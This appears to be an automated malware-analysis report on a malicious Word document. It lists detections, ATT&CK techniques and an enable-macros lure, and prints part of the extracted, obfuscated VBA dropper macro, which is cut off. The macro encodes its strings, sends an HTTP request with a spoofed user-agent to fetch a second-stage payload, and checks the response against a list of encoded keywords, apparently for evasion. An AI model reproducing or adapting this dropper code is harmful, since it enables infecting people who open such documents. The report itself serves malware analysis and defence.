MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros that use the Shell() function to execute commands and CreateObject to interact with system components. The document explicitly prompts the user to enable macros, indicating a lure to bypass security. The VBA script attempts to download a second-stage payload from a constructed URL, which is a common dropper behavior.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-1848766 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1848766
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6073 bytes |
SHA-256: 6555c3f803f619be22f217b84c244cbfa782e868688d654a35f5866610209f35 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim vGfGTZ As Boolean
Public Sub zACPgx()
If vGfGTZ Then Exit Sub
vGfGTZ = True
CaOXz
End Sub
Public Sub Kophy_Painted(ByVal rgASQ As Long, ByVal cEwMEHX As IInkRectangle)
zACPgx
End Sub
Public Sub qRxCP()
DJnlpDa = hfaTr
If Not JJyTw(DJnlpDa, a("jDNCDwAAOMNIEV", 51, 106)) Then Error 205
If ICdZB(DJnlpDa, ZeHTx) Then Error 206
End Sub
Private Function hfaTr() As String
Set LnTCqYF = CreateObject(QlYWRXx)
LnTCqYF.Open uKFlrR, xUAdmLc, mmAoEO
LnTCqYF.SetRequestHeader a("XUgssehenMrtA-MRA", 88, 137), a("6Nwn .EMeipc0/loRO)5ni .TsdW0 S;bao 4lzeQp.tdT0 oi;7I ltm(.aiMLV0/er;", 163, 622)
LnTCqYF.SetRequestHeader nnDCn, uvpcMrU
LnTCqYF.Send
If 200 = LnTCqYF.Status Then
hfaTr = LnTCqYF.ResponseText
End If
End Function
Private Function QlYWRXx() As String
QlYWRXx = a("nuiqWeVRnpItWtwHKnQi1W..5p.tttsHe", 64, 70)
End Function
Private Function nnDCn() As String
nnDCn = a("eRIrEgeElfwreE", 95, 15)
End Function
Private Function uvpcMrU() As String
uvpcMrU = a("staeyspxn-Dsm/ia:ilpJ/no-W/dcafw.adSwctdXwoerh.m-etm/m", 437, 531)
End Function
Private Function xUAdmLc() As String
xUAdmLc = a("m/eo.Cvmh/.sy/wSimS2itcc:/gwopaC.ntio/mewQ/xi1dpt", 160, 449)
End Function
Private Function ZeHTx()
ZeHTx = Array(a("OEOJlNksTcEhi", 93, 124), a("cRArkratbpHoDKiOSCELUimo", 203, 224), a("cNQjmrwRDePiEpo Ta", 133, 196), a("rwEGTErCkaTk MdnIa", 49, 32), a("ocsicCBToEnq", 23, 28), _
a("wsrWrCTeJErHV", 112, 92), a("MeAIWscmoteKmsm", 26, 52), a("DMmDGEiiEINUAnC", 37, 106), a(" rkUTPoTEuOnIpGR", 117, 76), a("CyOteniTRoflKJa", 29, 55), _
a("tnecAtaDMmHNkKkre", 67, 109), a("AltSuutVhwBSUreF", 39, 22), a("uFlRpDVOhCju", 41, 57), a("TrGsLeoWfocNUEGHGSuiN tKeo", 265, 251), a("ZAMAqtOkuDENO", 142, 16), _
a("oyEMULaTIpSohtj", 29, 72), a("uIeXcGotAoTbCLy", 92, 131), a("aCMkQAixvDcraej", 139, 162), a("tDWishnCogfSeZ", 45, 19), a("HHAgUO svoVshx", 61, 117), _
a("PLd KLVOAdOkAwtp", 169, 111), a("DIcrcxuAdmteJEdb", 83, 88), a("QTemdNGaTQTRwaEmc", 173, 55), a("ZODRtpnXiUoppCfUo", 168, 56), a("CNJRziCBzsEefY", 19, 65), _
a("makoNeUOisNFTYgA", 131, 81), a("rwkreiZwEeFkay", 93, 38), a("qkVZXsKROwtenEsidARAPGy", 229, 135), a("BveEGBaIHlSTSgmYas", 133, 104), a("CxLAeEkhnlEswBe", 53, 47), _
a("mrlVCubGagxVTT", 53, 45), a("RjtOTnSmQOIefCrt", 35, 71), a("iePkmecAPsKCArrh", 95, 77), a("UealPtNaoeSsVRm", 109, 132), a("ERATIwZGhNWHeW", 45, 123), _
a("ipREyCwrmoTFNiilo", 168, 79), a("kMuCTYzl apvbEOj", 91, 76), a("SEXzlAoCwRUnan", 39, 153), a("sXEZXlJpAjHcar", 67, 101), a("NscqEYsiIkURYiVTe", 143, 146), _
a("kNrGUTNOzdMvAcEep", 55, 105), a("OrewPIntNfhRorF", 26, 110), a("eFkMoMERVIcNl", 133, 102), a("bdMOs,eeyIeLP tsQ", 25, 126), a("RMevcJCdrYIoinTKR", 181, 133), _
a("tyOSyoafrAM", 35, 105), a(".sLHEhIDIhCpKEEHS", 61, 168), a("JfkKDEtSOHeRO", 51, 35), a("cUKIegArSnyuuOt", 131, 23), a("aSddgBfRvTNbGEEXiE", 155, 23))
End Function
Private Function mmAoEO() As Boolean
mmAoEO = False
End Function
Private Function uKFlrR() As String
uKFlrR = a("bZTEGgtlxV", 109, 64)
End Function
Private Function JJyTw(ByVal DjMwzb As String, ByVal anhioZg As String) As Boolean
qJIIXIK = InStrRev(nmiKPTL(DjMwzb), nmiKPTL(anhioZg))
JJyTw = qJIIXIK <> ysVlbdd
End Function
Private Function ysVlbdd() As Integer
ysVlbdd = 0
End Function
Private Function nmiKPTL(ByVal qgAhsjZ As String) As String
nmiKPTL = LCase(qgAhsjZ)
End Function
Private Function ICdZB(ByVal DjMwzb As String, ByVal BQKxeU) As Boolean
For Each anhioZg In BQKxeU
If JJyTw(DjMwzb, anhioZg) Then GoTo yEPjK
Next
Exit Function
yEPjK:
ICdZB = True
End Function
Private Function nFzRRtI(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
nFzRRtI = aOJBu(iEgcz(qgAhsjZ, qJIIXIK), 1)
End Function
Private Function aOJBu(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
aOJBu = Rig
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.